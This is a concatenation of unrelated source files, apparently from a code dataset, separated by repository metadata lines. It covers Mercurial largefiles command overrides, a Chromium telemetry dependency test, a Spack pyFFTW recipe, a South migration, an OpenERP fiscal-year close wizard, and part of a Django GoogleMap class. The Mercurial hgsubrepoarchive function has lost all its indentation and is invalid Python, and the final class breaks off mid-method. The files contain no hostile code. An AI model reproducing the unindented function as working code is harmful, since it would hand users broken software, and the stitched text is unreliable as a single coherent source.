            lfdirstate.write()
    finally:
        wlock.release()
def hgupdaterepo(orig, repo, node, overwrite):
    """Wrap hg.updaterepo: refresh largefiles after the working-copy update.

    For non-overwriting updates, only the largefiles whose standins
    changed are refreshed, by diffing the standin state before and after.
    """
    oldstandins = None
    if not overwrite:
        # Snapshot standins so only changed largefiles are updated later.
        oldstandins = lfutil.getstandinsstate(repo)
    result = orig(repo, node, overwrite)
    filelist = None
    if not overwrite:
        newstandins = lfutil.getstandinsstate(repo)
        filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
    lfcommands.updatelfiles(repo.ui, repo, filelist=filelist)
    return result
def hgmerge(orig, repo, node, force=None, remind=True):
    """Wrap hg.merge: refresh largefiles once the standins are merged."""
    ret = orig(repo, node, force, remind)
    lfcommands.updatelfiles(repo.ui, repo)
    return ret
# When we rebase a repository with remotely changed largefiles, we need to
# take some extra care so that the largefiles are correctly updated in the
# working copy
def overridepull(orig, ui, repo, source=None, **opts):
    """Wrap 'hg pull': run rebase after the pull when --rebase is given,
    and cache largefiles for newly pulled revisions selected by --lfrev
    (or all of them with --all-largefiles).
    """
    revsprepull = len(repo)
    if not source:
        source = 'default'
    repo.lfpullsource = source
    if opts.get('rebase', False):
        repo._isrebasing = True
        try:
            if opts.get('update'):
                del opts['update']
                ui.debug('--update and --rebase are not compatible, ignoring '
                         'the update flag\n')
            del opts['rebase']
            cmdutil.bailifchanged(repo)
            origpostincoming = commands.postincoming
            def _dummy(*args, **kwargs):
                # Suppress the post-pull update; rebase moves the
                # working copy itself.
                pass
            commands.postincoming = _dummy
            try:
                result = commands.pull(ui, repo, source, **opts)
            finally:
                commands.postincoming = origpostincoming
            revspostpull = len(repo)
            if revspostpull > revsprepull:
                result = result or rebase.rebase(ui, repo)
        finally:
            repo._isrebasing = False
    else:
        result = orig(ui, repo, source, **opts)
        revspostpull = len(repo)
        lfrevs = opts.get('lfrev', [])
        if opts.get('all_largefiles'):
            lfrevs.append('pulled()')
        if lfrevs and revspostpull > revsprepull:
            numcached = 0
            repo.firstpulled = revsprepull # for pulled() revset expression
            try:
                for rev in scmutil.revrange(repo, lfrevs):
                    ui.note(_('pulling largefiles for revision %s\n') % rev)
                    (cached, missing) = lfcommands.cachelfiles(ui, repo, rev)
                    numcached += len(cached)
            finally:
                del repo.firstpulled
            ui.status(_("%d largefiles cached\n") % numcached)
    return result
def pulledrevsetsymbol(repo, subset, x):
    """``pulled()``
    Changesets that just has been pulled.
    Only available with largefiles from pull --lfrev expressions.
    .. container:: verbose
    Some examples:
    - pull largefiles for all new changesets::
    hg pull -lfrev "pulled()"
    - pull largefiles for all new branch heads::
    hg pull -lfrev "head(pulled()) and not closed()"
    """
    # repo.firstpulled is only set while overridepull is caching lfrevs.
    try:
        firstpulled = repo.firstpulled
    except AttributeError:
        raise util.Abort(_("pulled() only available in --lfrev"))
    return [rev for rev in subset if rev >= firstpulled]
def overrideclone(orig, ui, source, dest=None, **opts):
    """Wrap 'hg clone': reject --all-largefiles with a non-local target.

    Fix: the abort message was interpolated *inside* the ``_()`` call
    (``_('...%s' % d)``), so the gettext catalog lookup could never match
    a translation; format after translating instead.
    """
    d = dest
    if d is None:
        d = hg.defaultdest(source)
    if opts.get('all_largefiles') and not hg.islocal(d):
        raise util.Abort(_(
            '--all-largefiles is incompatible with non-local destination %s')
            % d)
    return orig(ui, source, dest, **opts)
def hgclone(orig, ui, opts, *args, **kwargs):
    """Wrap hg.clone: with --all-largefiles, download every largefile of
    the cloned repo; a clone with missing largefiles is reported as
    failed (None)."""
    result = orig(ui, opts, *args, **kwargs)
    if result is None:
        return None
    sourcerepo, destrepo = result
    repo = destrepo.local()
    # Caching is implicitly limited to 'rev' option, since the dest repo
    # was truncated at that point. The user may expect a download count
    # with this option, so attempt whether or not this is a largefile repo.
    if opts.get('all_largefiles'):
        success, missing = lfcommands.downloadlfiles(ui, repo, None)
        if missing != 0:
            return None
    return result
def overriderebase(orig, ui, repo, **opts):
    """Run rebase with the repo flagged as rebasing so other largefiles
    hooks can adjust their behaviour."""
    repo._isrebasing = True
    try:
        return orig(ui, repo, **opts)
    finally:
        repo._isrebasing = False
def overridearchive(orig, repo, dest, node, kind, decode=True, matchfn=None,
            prefix=None, mtime=None, subrepos=None):
    """Create an archive of *node*, replacing each standin with the
    largefile content it points to (fetched into the cache first).
    """
    # No need to lock because we are only reading history and
    # largefile caches, neither of which are modified.
    lfcommands.cachelfiles(repo.ui, repo, node)
    if kind not in archival.archivers:
        raise util.Abort(_("unknown archive type '%s'") % kind)
    ctx = repo[node]
    if kind == 'files':
        if prefix:
            raise util.Abort(
                _('cannot give prefix when archiving to files'))
    else:
        prefix = archival.tidyprefix(dest, kind, prefix)
    def write(name, mode, islink, getdata):
        # Emit one archive member, honouring the caller's matcher and
        # per-file decode filters.
        if matchfn and not matchfn(name):
            return
        data = getdata()
        if decode:
            data = repo.wwritedata(name, data)
        archiver.addfile(prefix + name, mode, islink, data)
    archiver = archival.archivers[kind](dest, mtime or ctx.date()[0])
    if repo.ui.configbool("ui", "archivemeta", True):
        def metadata():
            # Build the .hg_archival.txt contents (repo/node/branch/tags).
            base = 'repo: %s\nnode: %s\nbranch: %s\n' % (
                hex(repo.changelog.node(0)), hex(node), ctx.branch())
            tags = ''.join('tag: %s\n' % t for t in ctx.tags()
                           if repo.tagtype(t) == 'global')
            if not tags:
                repo.ui.pushbuffer()
                opts = {'template': '{latesttag}\n{latesttagdistance}',
                        'style': '', 'patch': None, 'git': None}
                cmdutil.show_changeset(repo.ui, repo, opts).show(ctx)
                ltags, dist = repo.ui.popbuffer().split('\n')
                tags = ''.join('latesttag: %s\n' % t for t in ltags.split(':'))
                tags += 'latesttagdistance: %s\n' % dist
            return base + tags
        write('.hg_archival.txt', 0644, False, metadata)
    for f in ctx:
        ff = ctx.flags(f)
        getdata = ctx[f].data
        if lfutil.isstandin(f):
            # Substitute the real largefile content for the standin.
            path = lfutil.findfile(repo, getdata().strip())
            if path is None:
                raise util.Abort(
                    _('largefile %s not found in repo store or system cache')
                    % lfutil.splitstandin(f))
            f = lfutil.splitstandin(f)
            def getdatafn():
                fd = None
                try:
                    fd = open(path, 'rb')
                    return fd.read()
                finally:
                    if fd:
                        fd.close()
            getdata = getdatafn
        write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
    if subrepos:
        for subpath in sorted(ctx.substate):
            sub = ctx.sub(subpath)
            submatch = match_.narrowmatcher(subpath, matchfn)
            sub.archive(repo.ui, archiver, prefix, submatch)
    archiver.done()
def hgsubrepoarchive(orig, repo, ui, archiver, prefix, match=None):
repo._get(repo._state + ('hg',))
rev = repo._state[1]
ctx = repo._repo[rev]
lfcommands.cachelfiles(ui, repo._repo, ctx.node())
def write(name, mode, islink, getdata):
# At this point, the standin has been replaced with the largefile name,
# so the normal matcher works here without the lfutil variants.
if match and not match(f):
return
data = getdata()
archiver.addfile(prefix + repo._path + '/' + name, mode, islink, data)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo._repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(os.path.join(prefix, path), 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, match)
sub.archive(ui, archiver, os.path.join(prefix, repo._path) + '/',
submatch)
# If a largefile is modified, the change is not reflected in its
# standin until a commit. cmdutil.bailifchanged() raises an exception
# if the repo has uncommitted changes. Wrap it to also check if
# largefiles were changed. This is used by bisect and backout.
def overridebailifchanged(orig, repo):
    """Wrap cmdutil.bailifchanged to also abort on largefile changes.

    Standins only reflect largefile edits at commit time, so the stock
    check misses them; re-run status with lfstatus enabled.
    """
    orig(repo)
    repo.lfstatus = True
    changes = repo.status()[:4]
    repo.lfstatus = False
    if any(changes):
        raise util.Abort(_('outstanding uncommitted changes'))
# Fetch doesn't use cmdutil.bailifchanged so override it to add the check
def overridefetch(orig, ui, repo, *pats, **opts):
    """Wrap the fetch extension: abort on uncommitted largefile changes.

    fetch does not call cmdutil.bailifchanged, so the largefile-aware
    check is performed here before delegating.
    """
    repo.lfstatus = True
    changes = repo.status()[:4]
    repo.lfstatus = False
    if any(changes):
        raise util.Abort(_('outstanding uncommitted changes'))
    return orig(ui, repo, *pats, **opts)
def overrideforget(orig, ui, repo, *pats, **opts):
    """Wrap 'hg forget': forget normal files via orig(), then forget the
    matched largefiles by dropping their standins and lfdirstate entries.
    """
    installnormalfilesmatchfn(repo[None].manifest())
    result = orig(ui, repo, *pats, **opts)
    restorematchfn()
    m = scmutil.match(repo[None], pats, opts)
    try:
        repo.lfstatus = True
        s = repo.status(match=m, clean=True)
    finally:
        repo.lfstatus = False
    # modified + added + missing + clean, limited to tracked largefiles.
    forget = sorted(s[0] + s[1] + s[3] + s[6])
    forget = [f for f in forget if lfutil.standin(f) in repo[None].manifest()]
    for f in forget:
        if lfutil.standin(f) not in repo.dirstate and not \
                os.path.isdir(m.rel(lfutil.standin(f))):
            ui.warn(_('not removing %s: file is already untracked\n')
                    % m.rel(f))
            result = 1
    for f in forget:
        if ui.verbose or not m.exact(f):
            ui.status(_('removing %s\n') % m.rel(f))
    # Need to lock because standin files are deleted then removed from the
    # repository and we could race in-between.
    wlock = repo.wlock()
    try:
        lfdirstate = lfutil.openlfdirstate(ui, repo)
        for f in forget:
            if lfdirstate[f] == 'a':
                lfdirstate.drop(f)
            else:
                lfdirstate.remove(f)
        lfdirstate.write()
        standins = [lfutil.standin(f) for f in forget]
        for f in standins:
            util.unlinkpath(repo.wjoin(f), ignoremissing=True)
        repo[None].forget(standins)
    finally:
        wlock.release()
    return result
def getoutgoinglfiles(ui, repo, dest=None, **opts):
    """Return the sorted standins that would be uploaded by a push to *dest*.

    Returns None when the remote repo cannot be reached, and an empty
    list when there are no outgoing changesets.
    """
    dest = ui.expandpath(dest or 'default-push', dest or 'default')
    dest, branches = hg.parseurl(dest, opts.get('branch'))
    revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get('rev'))
    if revs:
        revs = [repo.lookup(rev) for rev in scmutil.revrange(repo, revs)]
    try:
        remote = hg.peer(repo, opts, dest)
    except error.RepoError:
        return None
    outgoing = discovery.findcommonoutgoing(repo, remote.peer(), force=False)
    if not outgoing.missing:
        return outgoing.missing
    o = repo.changelog.nodesbetween(outgoing.missing, revs)[0]
    if opts.get('newest_first'):
        o.reverse()
    toupload = set()
    for n in o:
        parents = [p for p in repo.changelog.parents(n) if p != node.nullid]
        ctx = repo[n]
        files = set(ctx.files())
        if len(parents) == 2:
            # For merges, also compare the merge manifest against both
            # parents to pick up files ctx.files() does not list.
            mc = ctx.manifest()
            mp1 = ctx.parents()[0].manifest()
            mp2 = ctx.parents()[1].manifest()
            for f in mp1:
                if f not in mc:
                    files.add(f)
            for f in mp2:
                if f not in mc:
                    files.add(f)
            for f in mc:
                if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
                    files.add(f)
        toupload = toupload.union(
            set([f for f in files if lfutil.isstandin(f) and f in ctx]))
    return sorted(toupload)
def overrideoutgoing(orig, ui, repo, dest=None, **opts):
    """Wrap 'hg outgoing': with --large, also list largefiles to upload."""
    result = orig(ui, repo, dest, **opts)
    if opts.pop('large', None):
        toupload = getoutgoinglfiles(ui, repo, dest, **opts)
        if toupload is None:
            ui.status(_('largefiles: No remote repo\n'))
        elif not toupload:
            ui.status(_('largefiles: no files to upload\n'))
        else:
            ui.status(_('largefiles to upload:\n'))
            for standin in toupload:
                ui.status(lfutil.splitstandin(standin) + '\n')
            ui.status('\n')
    return result
def overridesummary(orig, ui, repo, *pats, **opts):
    """Wrap 'hg summary': with --large, report largefiles pending upload."""
    repo.lfstatus = True
    try:
        orig(ui, repo, *pats, **opts)
    finally:
        repo.lfstatus = False
    if not opts.pop('large', None):
        return
    toupload = getoutgoinglfiles(ui, repo, None, **opts)
    if toupload is None:
        # i18n: column positioning for "hg summary"
        ui.status(_('largefiles: (no remote repo)\n'))
    elif not toupload:
        # i18n: column positioning for "hg summary"
        ui.status(_('largefiles: (no files to upload)\n'))
    else:
        # i18n: column positioning for "hg summary"
        ui.status(_('largefiles: %d to upload\n') % len(toupload))
def scmutiladdremove(orig, repo, pats=None, opts=None, dry_run=None,
                     similarity=None):
    """Wrap scmutil.addremove to handle largefiles before normal files.

    Missing largefiles are removed and new largefile candidates added
    through the largefiles code paths; the remaining (normal) files are
    then delegated to the original addremove with a matcher installed
    that ignores largefiles.
    """
    # Fix: the original used mutable default arguments ([] / {}), which are
    # shared between calls; use None sentinels and fresh containers instead.
    if pats is None:
        pats = []
    if opts is None:
        opts = {}
    if not lfutil.islfilesrepo(repo):
        return orig(repo, pats, opts, dry_run, similarity)
    # Get the list of missing largefiles so we can remove them
    lfdirstate = lfutil.openlfdirstate(repo.ui, repo)
    s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
                          False, False)
    (unsure, modified, added, removed, missing, unknown, ignored, clean) = s
    # Call into the normal remove code, but the removing of the standin, we want
    # to have handled by original addremove. Monkey patching here makes sure
    # we don't remove the standin in the largefiles code, preventing a very
    # confused state later.
    if missing:
        m = [repo.wjoin(f) for f in missing]
        repo._isaddremove = True
        removelargefiles(repo.ui, repo, *m, **opts)
        repo._isaddremove = False
    # Call into the normal add code, and any files that *should* be added as
    # largefiles will be
    addlargefiles(repo.ui, repo, *pats, **opts)
    # Now that we've handled largefiles, hand off to the original addremove
    # function to take care of the rest. Make sure it doesn't do anything with
    # largefiles by installing a matcher that will ignore them.
    installnormalfilesmatchfn(repo[None].manifest())
    result = orig(repo, pats, opts, dry_run, similarity)
    restorematchfn()
    return result
# Calling purge with --all will cause the largefiles to be deleted.
# Override repo.status to prevent this from happening.
def overridepurge(orig, ui, repo, *dirs, **opts):
    """Wrap the purge command so largefiles are not treated as unknown.

    Temporarily replaces repo.status with a variant that drops largefiles
    from the unknown/ignored lists, so 'purge --all' does not delete them;
    the original status method is restored after the wrapped call.
    """
    # XXX large file status is buggy when used on repo proxy.
    # XXX this needs to be investigated.
    repo = repo.unfiltered()
    oldstatus = repo.status
    def overridestatus(node1='.', node2=None, match=None, ignored=False,
                       clean=False, unknown=False, listsubrepos=False):
        # Delegate to the real status, then filter the unknown/ignored
        # lists down to entries the largefiles dirstate considers
        # untracked ('?') — everything else is a tracked largefile.
        r = oldstatus(node1, node2, match, ignored, clean, unknown,
                      listsubrepos)
        lfdirstate = lfutil.openlfdirstate(ui, repo)
        modified, added, removed, deleted, unknown, ignored, clean = r
        unknown = [f for f in unknown if lfdirstate[f] == '?']
        ignored = [f for f in ignored if lfdirstate[f] == '?']
        return modified, added, removed, deleted, unknown, ignored, clean
    repo.status = overridestatus
    orig(ui, repo, *dirs, **opts)
    # Restore the original status method once purge has run.
    repo.status = oldstatus
def overriderollback(orig, ui, repo, **opts):
    """Wrap rollback and re-sync the largefiles dirstate afterwards."""
    result = orig(ui, repo, **opts)
    # Refresh working-copy standins to match the restored parent.
    merge.update(repo, node=None, branchmerge=False, force=True,
                 partial=lfutil.isstandin)
    wlock = repo.wlock()
    try:
        lfdirstate = lfutil.openlfdirstate(ui, repo)
        lfiles = lfutil.listlfiles(repo)
        oldlfiles = lfutil.listlfiles(repo, repo[None].parents()[0].rev())
        for lfile in lfiles:
            # Pre-existing largefiles keep their state; new ones are added.
            mark = (lfdirstate.normallookup if lfile in oldlfiles
                    else lfdirstate.add)
            mark(lfile)
        lfdirstate.write()
    finally:
        wlock.release()
    return result
def overridetransplant(orig, ui, repo, *revs, **opts):
    """Wrap transplant and refresh largefiles whose standins changed."""
    try:
        standins_before = lfutil.getstandinsstate(repo)
        repo._istransplanting = True
        result = orig(ui, repo, *revs, **opts)
        standins_after = lfutil.getstandinsstate(repo)
        changed = lfutil.getlfilestoupdate(standins_before, standins_after)
        lfcommands.updatelfiles(repo.ui, repo, filelist=changed,
                                printmessage=True)
    finally:
        # Always clear the flag, even if the wrapped command raised.
        repo._istransplanting = False
    return result
def overridecat(orig, ui, repo, file1, *pats, **opts):
    """Wrap 'hg cat' so largefiles can be catted by their visible name.

    Standins are resolved to the corresponding largefile contents; files
    missing from the user cache are fetched from the configured store.
    Returns 0 if at least one file was written, 1 otherwise.
    """
    ctx = scmutil.revsingle(repo, opts.get('rev'))
    err = 1
    notbad = set()
    m = scmutil.match(ctx, (file1,) + pats, opts)
    origmatchfn = m.matchfn
    def lfmatchfn(f):
        # Match standins through their largefile name; remember the name so
        # the bad-file callback below does not complain about it.
        lf = lfutil.splitstandin(f)
        if lf is None:
            return origmatchfn(f)
        notbad.add(lf)
        return origmatchfn(lf)
    m.matchfn = lfmatchfn
    origbadfn = m.bad
    def lfbadfn(f, msg):
        # Idiom fix: 'f not in notbad' (was 'not f in notbad').
        if f not in notbad:
            return origbadfn(f, msg)
    m.bad = lfbadfn
    for f in ctx.walk(m):
        fp = cmdutil.makefileobj(repo, opts.get('output'), ctx.node(),
                                 pathname=f)
        lf = lfutil.splitstandin(f)
        if lf is None:
            # duplicating unreachable code from commands.cat
            data = ctx[f].data()
            if opts.get('decode'):
                data = repo.wwritedata(f, data)
            fp.write(data)
        else:
            # Renamed from 'hash' to avoid shadowing the builtin.
            hexhash = lfutil.readstandin(repo, lf, ctx.rev())
            if not lfutil.inusercache(repo.ui, hexhash):
                store = basestore._openstore(repo)
                success, missing = store.get([(lf, hexhash)])
                if len(success) != 1:
                    raise util.Abort(
                        _('largefile %s is not in cache and could not be '
                          'downloaded') % lf)
            path = lfutil.usercachepath(repo.ui, hexhash)
            fpin = open(path, "rb")
            # Fix: close the input file even if a write fails mid-copy.
            try:
                for chunk in util.filechunkiter(fpin, 128 * 1024):
                    fp.write(chunk)
            finally:
                fpin.close()
        fp.close()
        err = 0
    return err
def mercurialsinkbefore(orig, sink):
    """Flag the convert sink's repo as converting before the sink runs.

    The _isconverting flag is read elsewhere in largefiles to suppress
    standin processing while a conversion is in progress.
    """
    sink.repo._isconverting = True
    orig(sink)
def mercurialsinkafter(orig, sink):
    """Clear the converting flag on the sink's repo after the sink runs."""
    sink.repo._isconverting = False
    orig(sink)
| apache-2.0 |
PeterWangIntel/chromium-crosswalk | tools/telemetry/telemetry/telemetry_dependencies_unittest.py | 5 | 2039 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import unittest
from telemetry.util import path
from telemetry.util import find_dependencies
_TELEMETRY_DEPS_PATH = os.path.join(
path.GetTelemetryDir(), 'telemetry', 'TELEMETRY_DEPS')
def _GetCurrentTelemetryDependencies():
    """Compute telemetry's current dependency set via find_dependencies.

    Builds the FindDependencies command's option parser, parses empty
    arguments so defaults apply, and runs the dependency walk.
    """
    parser = find_dependencies.FindDependenciesCommand.CreateParser()
    find_dependencies.FindDependenciesCommand.AddCommandLineArgs(parser, None)
    options, args = parser.parse_args([''])
    options.positional_args = args
    return find_dependencies.FindDependencies([], options=options)
def _GetRestrictedTelemetryDeps():
    """Load the TELEMETRY_DEPS whitelist with all paths made absolute."""
    with open(_TELEMETRY_DEPS_PATH, 'r') as deps_file:
        telemetry_deps = json.load(deps_file)
    # Normalize paths in telemetry_deps since TELEMETRY_DEPS file only contain
    # the relative path in chromium/src/.
    src_dir = path.GetChromiumSrcDir()
    def _Absolute(rel_path):
        rel_path = rel_path.replace('/', os.path.sep)
        return os.path.realpath(os.path.join(src_dir, rel_path))
    for dep_key in ('file_deps', 'directory_deps'):
        telemetry_deps[dep_key] = [
            _Absolute(p) for p in telemetry_deps[dep_key]]
    return telemetry_deps
class TelemetryDependenciesTest(unittest.TestCase):
    """Guards against new, unreviewed dependencies creeping into telemetry."""

    def testNoNewTelemetryDependencies(self):
        """Fail if the current dependency walk finds anything outside
        the whitelist recorded in TELEMETRY_DEPS."""
        telemetry_deps = _GetRestrictedTelemetryDeps()
        current_dependencies = _GetCurrentTelemetryDependencies()
        extra_dep_paths = []
        for dep_path in current_dependencies:
            # A dependency is allowed if it is whitelisted directly or lives
            # under one of the whitelisted directories.
            if not (dep_path in telemetry_deps['file_deps'] or
                    any(path.IsSubpath(dep_path, d)
                        for d in telemetry_deps['directory_deps'])):
                extra_dep_paths.append(dep_path)
        if extra_dep_paths:
            self.fail(
                'Your patch adds new dependencies to telemetry. Please contact '
                'aiolos@,dtu@, or nednguyen@ on how to proceed with this change. '
                'Extra dependencies:\n%s' % '\n'.join(extra_dep_paths))
| bsd-3-clause |
rspavel/spack | var/spack/repos/builtin/packages/py-pyfftw/package.py | 5 | 1092 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPyfftw(PythonPackage):
    """A pythonic wrapper around FFTW, the FFT library,
    presenting a unified interface for all the supported transforms."""

    homepage = "http://hgomersall.github.com/pyFFTW"
    url = "https://pypi.io/packages/source/p/pyFFTW/pyFFTW-0.10.4.tar.gz"

    version('0.12.0', sha256='60988e823ca75808a26fd79d88dbae1de3699e72a293f812aa4534f8a0a58cb0')
    version('0.11.1', sha256='05ea28dede4c3aaaf5c66f56eb0f71849d0d50f5bc0f53ca0ffa69534af14926')
    version('0.10.4', sha256='739b436b7c0aeddf99a48749380260364d2dc027cf1d5f63dafb5f50068ede1a')

    # pyFFTW links against the native FFTW library.
    depends_on('fftw')
    depends_on('py-setuptools', type='build')
    # Cython 1.0+ is not supported by these releases; pin below 1.0.
    depends_on('py-cython@0.29:0.999', type='build')
    # NumPy compatibility differs per release line.
    depends_on('py-numpy@1.6:', type=('build', 'run'), when='@:0.10.4')
    depends_on('py-numpy@1.10:1.999', type=('build', 'run'), when='@0.11.0:')
| lgpl-2.1 |
ojii/gitstats.ep.io | src/stats/migrations/0001_initial.py | 1 | 1658 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration 0001: create the stats 'Repository' table."""

    def forwards(self, orm):
        # Adding model 'Repository'
        db.create_table('stats_repository', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=50)),
            ('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50, db_index=True)),
            ('repourl', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
            ('updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
        ))
        db.send_create_signal('stats', ['Repository'])

    def backwards(self, orm):
        # Deleting model 'Repository'
        db.delete_table('stats_repository')

    # Frozen ORM definitions South uses to reconstruct model state at this
    # point in migration history; must not be edited by hand.
    models = {
        'stats.repository': {
            'Meta': {'ordering': "['name']", 'object_name': 'Repository'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
            'repourl': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
            'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        }
    }

    complete_apps = ['stats']
| bsd-3-clause |
3dfxmadscientist/odoo_vi | addons/account/wizard/account_fiscalyear_close_state.py | 43 | 2504 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class account_fiscalyear_close_state(osv.osv_memory):
    """
    Closes Account Fiscalyear
    """
    _name = "account.fiscalyear.close.state"
    _description = "Fiscalyear Close state"
    _columns = {
        'fy_id': fields.many2one('account.fiscalyear', \
            'Fiscal Year to Close', required=True, help="Select a fiscal year to close"),
    }

    def data_save(self, cr, uid, ids, context=None):
        """
        Mark the selected fiscal year, its periods and their journal
        periods as 'done'.

        @param cr: the current row, from the database cursor,
        @param uid: the current user's ID for security checks,
        @param ids: List of Account fiscalyear close state's IDs
        """
        for data in self.read(cr, uid, ids, context=context):
            fy_id = data['fy_id'][0]
            # Close all journal periods belonging to the fiscal year's
            # periods. SQL is parameterized (%s) — values are never
            # string-interpolated into the statement.
            cr.execute('UPDATE account_journal_period ' \
                       'SET state = %s ' \
                       'WHERE period_id IN (SELECT id FROM account_period \
                       WHERE fiscalyear_id = %s)',
                       ('done', fy_id))
            # Then close the periods themselves ...
            cr.execute('UPDATE account_period SET state = %s ' \
                       'WHERE fiscalyear_id = %s', ('done', fy_id))
            # ... and finally the fiscal year record.
            cr.execute('UPDATE account_fiscalyear ' \
                       'SET state = %s WHERE id = %s', ('done', fy_id))
        return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ytjiang/django | django/contrib/gis/maps/google/gmap.py | 526 | 9223 | from __future__ import unicode_literals
from django.conf import settings
from django.contrib.gis.maps.google.overlays import (
GMarker, GPolygon, GPolyline,
)
from django.template.loader import render_to_string
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.six.moves import range
class GoogleMapException(Exception):
    """Raised for Google Maps configuration errors (e.g. missing API key)."""
    pass
# The default Google Maps URL (for the API javascript)
# TODO: Internationalize for Japan, UK, etc.
GOOGLE_MAPS_URL = 'http://maps.google.com/maps?file=api&v=%s&key='
class GoogleMap(object):
    """A class for generating Google Maps JavaScript.

    Collects map configuration (API key, center, zoom, overlays, KML URLs)
    and renders the JavaScript/HTML snippets needed to embed the map via
    the properties below (``js``, ``scripts``, ``body`` ...).
    """

    # String constants
    onunload = mark_safe('onunload="GUnload()"')  # Cleans up after Google Maps
    vml_css = mark_safe('v\:* {behavior:url(#default#VML);}')  # CSS for IE VML
    xmlns = mark_safe('xmlns:v="urn:schemas-microsoft-com:vml"')  # XML Namespace (for IE VML).

    def __init__(self, key=None, api_url=None, version=None,
                 center=None, zoom=None, dom_id='map',
                 kml_urls=None, polylines=None, polygons=None, markers=None,
                 template='gis/google/google-map.js',
                 js_module='geodjango',
                 extra_context=None):
        # Fix: kml_urls/extra_context previously used mutable default
        # arguments ([] / {}), shared between every GoogleMap instance.
        # None sentinels with fresh per-instance containers are used instead;
        # callers passing their own values are unaffected.
        if kml_urls is None:
            kml_urls = []
        if extra_context is None:
            extra_context = {}
        # The Google Maps API Key defined in the settings will be used
        # if not passed in as a parameter. The use of an API key is
        # _required_.
        if not key:
            try:
                self.key = settings.GOOGLE_MAPS_API_KEY
            except AttributeError:
                raise GoogleMapException(
                    'Google Maps API Key not found (try adding '
                    'GOOGLE_MAPS_API_KEY to your settings).'
                )
        else:
            self.key = key
        # Getting the Google Maps API version, defaults to using the latest ("2.x"),
        # this is not necessarily the most stable.
        if not version:
            self.version = getattr(settings, 'GOOGLE_MAPS_API_VERSION', '2.x')
        else:
            self.version = version
        # Can specify the API URL in the `api_url` keyword.
        if not api_url:
            self.api_url = getattr(settings, 'GOOGLE_MAPS_URL', GOOGLE_MAPS_URL) % self.version
        else:
            self.api_url = api_url
        # Setting the DOM id of the map, the load function, the JavaScript
        # template, and the KML URLs array.
        self.dom_id = dom_id
        self.extra_context = extra_context
        self.js_module = js_module
        self.template = template
        self.kml_urls = kml_urls
        # Does the user want any GMarker, GPolygon, and/or GPolyline overlays?
        # Raw values (e.g. geometries) are coerced into the overlay class.
        overlay_info = [[GMarker, markers, 'markers'],
                        [GPolygon, polygons, 'polygons'],
                        [GPolyline, polylines, 'polylines']]
        for overlay_class, overlay_list, varname in overlay_info:
            setattr(self, varname, [])
            if overlay_list:
                for overlay in overlay_list:
                    if isinstance(overlay, overlay_class):
                        getattr(self, varname).append(overlay)
                    else:
                        getattr(self, varname).append(overlay_class(overlay))
        # If GMarker, GPolygons, and/or GPolylines are used the zoom will be
        # automatically calculated via the Google Maps API. If both a zoom
        # level and a center coordinate are provided with polygons/polylines,
        # no automatic determination will occur.
        self.calc_zoom = False
        if self.polygons or self.polylines or self.markers:
            if center is None or zoom is None:
                self.calc_zoom = True
        # Defaults for the zoom level and center coordinates if the zoom
        # is not automatically calculated.
        if zoom is None:
            zoom = 4
        self.zoom = zoom
        if center is None:
            center = (0, 0)
        self.center = center

    def render(self):
        """
        Generates the JavaScript necessary for displaying this Google Map.
        """
        params = {'calc_zoom': self.calc_zoom,
                  'center': self.center,
                  'dom_id': self.dom_id,
                  'js_module': self.js_module,
                  'kml_urls': self.kml_urls,
                  'zoom': self.zoom,
                  'polygons': self.polygons,
                  'polylines': self.polylines,
                  'icons': self.icons,
                  'markers': self.markers,
                  }
        params.update(self.extra_context)
        return render_to_string(self.template, params)

    @property
    def body(self):
        "Returns HTML body tag for loading and unloading Google Maps javascript."
        return format_html('<body {} {}>', self.onload, self.onunload)

    @property
    def onload(self):
        "Returns the `onload` HTML <body> attribute."
